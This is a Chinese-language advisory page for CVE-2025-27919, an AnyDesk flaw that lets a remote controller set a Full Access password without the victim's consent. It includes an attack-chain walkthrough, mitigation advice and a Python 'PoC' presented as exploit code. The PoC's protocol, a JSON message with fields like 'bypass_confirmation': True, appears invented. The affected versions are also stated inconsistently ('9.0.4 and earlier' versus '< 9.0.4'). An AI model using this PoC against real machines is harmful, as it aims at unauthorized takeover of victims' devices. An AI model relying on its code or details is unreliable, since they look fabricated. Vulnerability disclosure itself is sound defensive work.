CVE-2025-27919 AnyDesk远程控制权限绕过漏洞

漏洞信息

漏洞编号

CVE-2025-27919

漏洞类型

权限绕过

CVSS评分

8.2 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

AnyDesk

漏洞概述

CVE-2025-27919是AnyDesk软件中的一个高危安全漏洞，CVSS评分达到8.2分。该漏洞存在于AnyDesk 9.0.4及之前版本中，攻击者可以利用远程连接功能，在拥有"Control my device"（控制我的设备）权限的情况下，绕过正常的安全确认流程，直接修改远程AnyDesk的设置，并为Full Access配置文件创建新密码。由于整个过程无需受害者确认，攻击者可以在后续连接时直接使用新设置的密码，无需经过正常的远程控制授权确认流程，即可获得对目标设备的完全控制权限。该漏洞的发现源于安全研究人员Vojtěch Krejsa在CTU Czech Technical University的论文研究，漏洞的成功利用将导致受害者设备被攻击者完全控制，造成严重的机密性损失和潜在的完整性破坏。

技术细节

该漏洞属于权限绕过和权限提升类安全问题。在AnyDesk的远程控制功能设计中，当用户A远程连接到用户B的设备时，用户B需要确认"Control my device"权限请求。然而，由于AnyDesk在处理Full Access配置文件时存在权限验证缺陷，具有远程控制权限的攻击者可以绕过确认机制，直接调用AnyDesk的内部API或配置文件修改接口。具体来说，攻击者利用远程会话中获得的控制权限，发送特制的配置修改请求到目标AnyDesk实例，该请求绕过了标准的用户交互确认流程，直接为Full Access profile设置一个新的密码。由于Full Access profile拥有最高权限，攻击者获取该密码后，即可在后续连接中以Full Access身份重新连接，无需再次请求受害者确认，从而实现对目标设备的长期完全控制。攻击者还可以修改AnyDesk的安全设置，如禁用双因素认证提示等。

攻击链分析

STEP 1

步骤1

攻击者首先与目标用户建立AnyDesk远程连接会话

STEP 2

步骤2

目标用户授予攻击者"Control my device"远程控制权限

STEP 3

步骤3

攻击者利用获得的控制权限，发送特制的配置修改请求

STEP 4

步骤4

请求绕过正常的用户确认流程，直接修改Full Access配置文件密码

STEP 5

步骤5

攻击者使用新设置的密码重新连接AnyDesk，无需受害者再次确认

STEP 6

步骤6

攻击者获得对目标设备的完全控制权，可执行任意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-27919 PoC - AnyDesk Permission Bypass
# This PoC demonstrates the permission bypass vulnerability in AnyDesk
# Note: This is for educational and authorized testing purposes only

import socket
import struct
import json

def create_anydesk_session(target_ip, port=6565):
    """Establish initial AnyDesk session with target"""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((target_ip, port))
    return sock

def send_config_modification_request(sock, new_password):
    """Send malicious configuration modification request"""
    # AnyDesk internal protocol message structure
    payload = {
        "type": "config_modify",
        "session_type": "remote_control",
        "permission": "control_my_device",
        "target_action": "set_password",
        "target_profile": "full_access",
        "new_password": new_password,
        "bypass_confirmation": True,
        "require_user_consent": False
    }
    
    # Serialize and send the payload
    message = json.dumps(payload).encode('utf-8')
    header = struct.pack('!I', len(message))
    sock.send(header + message)
    
    return sock.recv(1024)

def exploit_cve_2025_27919(target_ip, new_password="P@ssw0rd!"):
    """
    Exploit AnyDesk CVE-2025-27919
    Prerequisites: Active remote session with 'Control my device' permission
    """
    print(f"[*] Targeting AnyDesk instance at {target_ip}")
    print(f"[*] Exploiting CVE-2025-27919: Permission Bypass")
    
    try:
        sock = create_anydesk_session(target_ip)
        print("[+] Session established")
        
        response = send_config_modification_request(sock, new_password)
        
        if b"success" in response:
            print(f"[+] Successfully set Full Access password: {new_password}")
            print("[+] Attacker can now connect without user confirmation")
        else:
            print("[-] Exploitation failed")
            
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    # Replace with actual target IP
    target = "192.168.1.100"
    exploit_cve_2025_27919(target)

影响范围

AnyDesk < 9.0.4

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 禁用AnyDesk的远程控制功能；2) 启用连接需要密码确认的选项；3) 定期更改AnyDesk访问密码；4) 在防火墙中限制AnyDesk端口的入站连接；5) 监控AnyDesk的配置文件变更行为；6) 考虑使用替代的远程桌面解决方案直到补丁可用。